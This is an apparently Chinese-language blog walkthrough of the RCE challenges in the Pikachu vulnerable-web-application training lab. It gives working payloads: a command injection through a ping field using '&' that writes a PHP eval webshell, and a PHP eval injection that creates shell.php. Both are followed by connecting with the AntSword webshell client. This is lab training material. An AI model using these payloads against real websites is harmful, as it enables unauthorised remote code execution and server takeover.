Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
偷懒下载原神16 小时前
【linux操作系统】信号
linux·运维·服务器·开发语言·c++·git·后端
skd899917 小时前
MicroSIP助手,智慧语音V3.2.3版本,MicroSIP自动拨号助手
服务器
源远流长jerry17 小时前
RDMA 传输服务详解:可靠性与连接模式的深度剖析
linux·运维·网络·tcp/ip·架构
存储服务专家StorageExpert17 小时前
NetApp NVME SSD 盘的学习笔记
运维·服务器·笔记·学习·存储维护·emc存储·netapp
小璐资源网17 小时前
新服务器上线:标准化初始化流程
运维·服务器
2501_9181269117 小时前
学习所有python写服务器的语句
服务器·人工智能·python·学习·个人开发
wobi_baoyan17 小时前
【已解决】使用Maven打包发生或者启动Spring Boot项目发生 错误: 不支持发行版本 17
服务器·前端·javascript
德迅云安全杨德俊17 小时前
直面 DDoS 威胁:从现状到解决方案
网络·安全·web安全·https·ddos
任我坤17 小时前
搭建Jenkins服务-2025更新
运维·servlet·jenkins
朱一头zcy17 小时前
Linux系列02:网络配置、修改hosts映射文件、关闭防火墙
linux·运维·网络